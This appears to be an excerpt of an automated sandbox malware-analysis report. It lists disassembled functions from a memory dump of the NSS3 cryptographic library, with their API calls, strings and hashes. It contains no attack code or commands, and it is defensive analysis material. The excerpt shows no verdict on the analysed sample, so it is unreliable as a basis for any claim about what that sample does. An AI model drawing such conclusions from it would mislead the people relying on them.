                                                                                                                                                                                                                                                                                          • String ID: hSession = 0x%x$ pData = 0x%p$ pParameter = 0x%p$ pSignature = 0x%p$ pulSignatureLen = 0x%p$ ulDataLen = %d$ ulParameterLen = 0x%p$ (CK_INVALID_HANDLE)$C_SignMessage
                                                                                                                                                                                                                                                                                          • API String ID: 1003633598-1612141141
                                                                                                                                                                                                                                                                                          • Opcode ID: 55c9524a94509712fa5055b08ac85bf5f100b4aa141bee354ca3365422589bbf
                                                                                                                                                                                                                                                                                          • Instruction ID: 9a5ae8a5c0a66809c8e9f55e2be7099d56a3ed62855bf1fccadd36de013eca7d
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 55c9524a94509712fa5055b08ac85bf5f100b4aa141bee354ca3365422589bbf
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA41E075A01005AFDB718F54DF4CE9A7BB2AB4231DF884435E90867B12DB3CA858DBE1
                                                                                                                                                                                                                                                                                          Function 6C719FA0 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 184COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CERT_NewCertList.NSS3 ref: 6C719FBE
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F2F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C6F2F0A
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F2F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C6F2F1D
                                                                                                                                                                                                                                                                                          • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C71A015
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C731940: TlsGetValue.KERNEL32(00000000,00000000,?,00000001,?,6C73563C,?,?,00000000,00000001,00000002,?,?,?,?,?), ref: 6C73195C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C731940: EnterCriticalSection.KERNEL32(?,?,6C73563C,?,?,00000000,00000001,00000002,?,?,?,?,?,6C70EAC5,00000001), ref: 6C731970
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C731940: PR_Unlock.NSS3(?,?,00000000,00000001,00000002,?,?,?,?,?,6C70EAC5,00000001,?,6C70CE9B,00000001,6C70EAC5), ref: 6C7319A0
                                                                                                                                                                                                                                                                                          • PL_FreeArenaPool.NSS3(?), ref: 6C71A067
                                                                                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C852AA4,6C7512D0), ref: 6C71A055
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C674C70: TlsGetValue.KERNEL32(?,?,?,6C673921,6C8514E4,6C7BCC70), ref: 6C674C97
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C674C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C673921,6C8514E4,6C7BCC70), ref: 6C674CB0
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C674C70: PR_Unlock.NSS3(?,?,?,?,?,6C673921,6C8514E4,6C7BCC70), ref: 6C674CC9
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C71A07E
                                                                                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C852AA4,6C7512D0), ref: 6C71A0B1
                                                                                                                                                                                                                                                                                          • PL_FreeArenaPool.NSS3(?), ref: 6C71A0C7
                                                                                                                                                                                                                                                                                          • PL_FinishArenaPool.NSS3(?), ref: 6C71A0CF
                                                                                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C852AA4,6C7512D0), ref: 6C71A12E
                                                                                                                                                                                                                                                                                          • PL_FreeArenaPool.NSS3(?), ref: 6C71A140
                                                                                                                                                                                                                                                                                          • PL_FinishArenaPool.NSS3(?), ref: 6C71A148
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C71A158
                                                                                                                                                                                                                                                                                          • PL_FinishArenaPool.NSS3(?), ref: 6C71A175
                                                                                                                                                                                                                                                                                          • CERT_AddCertToListTail.NSS3(00000000,00000000), ref: 6C71A1A5
                                                                                                                                                                                                                                                                                          • CERT_DestroyCertificate.NSS3(00000000), ref: 6C71A1B2
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C71A1C6
                                                                                                                                                                                                                                                                                          • CERT_DestroyCertList.NSS3(00000000), ref: 6C71A1D6
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7355E0: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,6C70EAC5,00000001,?,6C70CE9B,00000001,6C70EAC5,00000003,-00000004,00000000,?,6C70EAC5), ref: 6C735627
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7355E0: PR_CallOnce.NSS3(6C852AA4,6C7512D0,?,?,?,?,?,?,?,?,?,?,6C70EAC5,00000001,?,6C70CE9B), ref: 6C73564F
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7355E0: PL_FreeArenaPool.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C70EAC5,00000001), ref: 6C735661
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7355E0: PR_SetError.NSS3(FFFFE01A,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C70EAC5), ref: 6C7356AF
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Arena$Pool$CallFreeOnce$CertErrorFinishList$CriticalDestroyEnterInitSectionUnlockUtilValue$Alloc_Arena_CertificateTailfree
                                                                                                                                                                                                                                                                                          • String ID: security
                                                                                                                                                                                                                                                                                          • API String ID: 3250630715-3315324353
                                                                                                                                                                                                                                                                                          • Opcode ID: 3965d63e986665d5a695d289fd3b7068568a2cad44e2415acb278883727acb38
                                                                                                                                                                                                                                                                                          • Instruction ID: 89cc5d41fe7c53d0b859201fa6181a4c824f89b2b8beb10a605f26d5f01fee35
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3965d63e986665d5a695d289fd3b7068568a2cad44e2415acb278883727acb38
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50515B71D042045BEB119FA4DE48BAE7374AF0136CF544034E819AAF41FB75DA0DC792
                                                                                                                                                                                                                                                                                          Function 6C734C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C734C4C
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C734C60
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C734CA1
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C734CBE
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C734CD2
                                                                                                                                                                                                                                                                                          • realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C734D3A
                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C734D4F
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C734DB7
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C79DD70: TlsGetValue.KERNEL32 ref: 6C79DD8C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C79DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C79DDB4
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C67204A), ref: 6C6E07AD
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C67204A), ref: 6C6E07CD
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C67204A), ref: 6C6E07D6
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C67204A), ref: 6C6E07E4
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: TlsSetValue.KERNEL32(00000000,?,6C67204A), ref: 6C6E0864
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C6E0880
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: TlsSetValue.KERNEL32(00000000,?,?,6C67204A), ref: 6C6E08CB
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: TlsGetValue.KERNEL32(?,?,6C67204A), ref: 6C6E08D7
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: TlsGetValue.KERNEL32(?,?,6C67204A), ref: 6C6E08FB
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C734DD7
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C734DEC
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C734E1B
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C734E2F
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C734E5A
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C734E71
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C734E7A
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C734EA2
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C734EC1
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C734ED6
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C734F01
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C734F2A
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 759471828-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 60f7e633c50b2cf386f19042875c36d71879b66c7eb82514f5cfbb33ff5439d4
                                                                                                                                                                                                                                                                                          • Instruction ID: 3ce4d8689a8ac59f2948cc867a430a5b83ab983a588ed314253b428d7131c579
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 60f7e633c50b2cf386f19042875c36d71879b66c7eb82514f5cfbb33ff5439d4
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5B155B1A002159FDF14EF68D944AAA7BB8BF4931CF045034ED0997B42EB36E964CBD1
                                                                                                                                                                                                                                                                                          Function 6C73FFB0 Relevance: 30.1, APIs: 20, Instructions: 68COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3(?,?,6C7376C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7075C2,00000000), ref: 6C73FFB4
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B98D0: calloc.MOZGLUE(00000001,00000084,6C6E0936,00000001,?,6C6E102C), ref: 6C7B98E5
                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3(?,?,6C7376C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7075C2,00000000), ref: 6C73FFC6
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B98D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C7B9946
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B98D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6716B7,00000000), ref: 6C7B994E
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B98D0: free.MOZGLUE(00000000), ref: 6C7B995E
                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3(?,?,6C7376C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7075C2,00000000), ref: 6C73FFD6
                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3(?,?,6C7376C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7075C2,00000000), ref: 6C73FFE6
                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3(?,?,6C7376C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7075C2,00000000), ref: 6C73FFF6
                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3(?,?,6C7376C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7075C2,00000000), ref: 6C740006
                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3(?,?,6C7376C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7075C2,00000000), ref: 6C740016
                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3(?,?,6C7376C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7075C2,00000000), ref: 6C740026
                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3(?,?,6C7376C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7075C2,00000000), ref: 6C740036
                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3(?,?,6C7376C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7075C2,00000000), ref: 6C740046
                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3(?,?,6C7376C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7075C2,00000000), ref: 6C740056
                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3(?,?,6C7376C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7075C2,00000000), ref: 6C740066
                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3(?,?,6C7376C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7075C2,00000000), ref: 6C740076
                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3(?,?,6C7376C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7075C2,00000000), ref: 6C740086
                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3(?,?,6C7376C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7075C2,00000000), ref: 6C740096
                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3(?,?,6C7376C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7075C2,00000000), ref: 6C7400A6
                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3(?,?,6C7376C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7075C2,00000000), ref: 6C7400B6
                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3(?,?,6C7376C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7075C2,00000000), ref: 6C7400C6
                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3(?,?,6C7376C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7075C2,00000000), ref: 6C7400D6
                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3(?,?,6C7376C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7075C2,00000000), ref: 6C7400E6
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Lock$CountCriticalErrorInitializeLastSectionSpincallocfree
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1407103528-0
                                                                                                                                                                                                                                                                                          • Opcode ID: afa7ea281dd4ecaebcba0bb100c82f3c2e12eea3cc865f9f6438987ca9ed4467
                                                                                                                                                                                                                                                                                          • Instruction ID: 7e06ee8666e449dc9adaa450faebaac4032817b29e70b1529c18c3555ac9c964
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: afa7ea281dd4ecaebcba0bb100c82f3c2e12eea3cc865f9f6438987ca9ed4467
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9131DBF1E016189E8BE5DF26824C18A3AB4AB37A4CB90513ED024A7710DFFC014ACBD5
                                                                                                                                                                                                                                                                                          Function 6C786E90 Relevance: 30.1, APIs: 11, Strings: 6, Instructions: 305fileCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6C786BF7), ref: 6C786EB6
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E1240: TlsGetValue.KERNEL32(00000040,?,6C6E116C,NSPR_LOG_MODULES), ref: 6C6E1267
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E1240: EnterCriticalSection.KERNEL32(?,?,?,6C6E116C,NSPR_LOG_MODULES), ref: 6C6E127C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C6E116C,NSPR_LOG_MODULES), ref: 6C6E1291
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E1240: PR_Unlock.NSS3(?,?,?,?,6C6E116C,NSPR_LOG_MODULES), ref: 6C6E12A0
                                                                                                                                                                                                                                                                                          • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6C82FC0A,6C786BF7), ref: 6C786ECD
                                                                                                                                                                                                                                                                                          • ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C786EE0
                                                                                                                                                                                                                                                                                          • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6C786EFC
                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C786F04
                                                                                                                                                                                                                                                                                          • fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C786F18
                                                                                                                                                                                                                                                                                          • PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6C786BF7), ref: 6C786F30
                                                                                                                                                                                                                                                                                          • PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6C786BF7), ref: 6C786F54
                                                                                                                                                                                                                                                                                          • PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6C786BF7), ref: 6C786FE0
                                                                                                                                                                                                                                                                                          • PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6C786BF7), ref: 6C786FFD
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          • SSLFORCELOCKS, xrefs: 6C786F2B
                                                                                                                                                                                                                                                                                          • # SSL/TLS secrets log file, generated by NSS, xrefs: 6C786EF7
                                                                                                                                                                                                                                                                                          • NSS_SSL_CBC_RANDOM_IV, xrefs: 6C786FF8
                                                                                                                                                                                                                                                                                          • SSLKEYLOGFILE, xrefs: 6C786EB1
                                                                                                                                                                                                                                                                                          • NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6C786F4F
                                                                                                                                                                                                                                                                                          • NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6C786FDB
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
                                                                                                                                                                                                                                                                                          • String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
                                                                                                                                                                                                                                                                                          • API String ID: 412497378-2352201381
                                                                                                                                                                                                                                                                                          • Opcode ID: df53b6e3a2ef8f46398dfb90b84b2fed4aa50509b3d6448dedf743e567b6667d
                                                                                                                                                                                                                                                                                          • Instruction ID: 0592be170244e2df92bdf0f5a3644ed934c576a5f45564ff64a4f2bcd921d750
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: df53b6e3a2ef8f46398dfb90b84b2fed4aa50509b3d6448dedf743e567b6667d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B0A1FA72B6B99186EB60463CCE0175432A2A79336EF984375FB32C7ED5DB79D440C282
                                                                                                                                                                                                                                                                                          Function 6C705DB0 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 238memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • NSS_GetAlgorithmPolicy.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C705DEC
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE0B5,00000000,?,?,?,?,?,?,?,?), ref: 6C705E0F
                                                                                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(00000828), ref: 6C705E35
                                                                                                                                                                                                                                                                                          • SECKEY_CopyPublicKey.NSS3(?), ref: 6C705E6A
                                                                                                                                                                                                                                                                                          • HASH_GetHashTypeByOidTag.NSS3(00000000), ref: 6C705EC3
                                                                                                                                                                                                                                                                                          • NSS_GetAlgorithmPolicy.NSS3(00000000,00000020), ref: 6C705ED9
                                                                                                                                                                                                                                                                                          • SECKEY_SignatureLen.NSS3(?), ref: 6C705F09
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE0B5,00000000), ref: 6C705F49
                                                                                                                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(?), ref: 6C705F89
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C705FA0
                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C705FB6
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C705FBF
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C70600C
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C706079
                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C706084
                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C706094
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Util$Item_Zfree$AlgorithmErrorPolicyPublicfreememcpy$Alloc_CopyDestroyHashSignatureType
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2310191401-3916222277
                                                                                                                                                                                                                                                                                          • Opcode ID: f76735a718d69cd1a7c37a61a2e2f3255410ba359f7cbe96870da621a2982cd1
                                                                                                                                                                                                                                                                                          • Instruction ID: 0cd9f7207ec078a5f706632277ebc2b1a58b8096d1ef2fc6d162d3957b201a8f
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f76735a718d69cd1a7c37a61a2e2f3255410ba359f7cbe96870da621a2982cd1
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F81F0F1F002059BDB50CA24EE89BAE77F8AF05318F144138E959EB781E734A944CBE5
                                                                                                                                                                                                                                                                                          Function 6C726D60 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 119COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
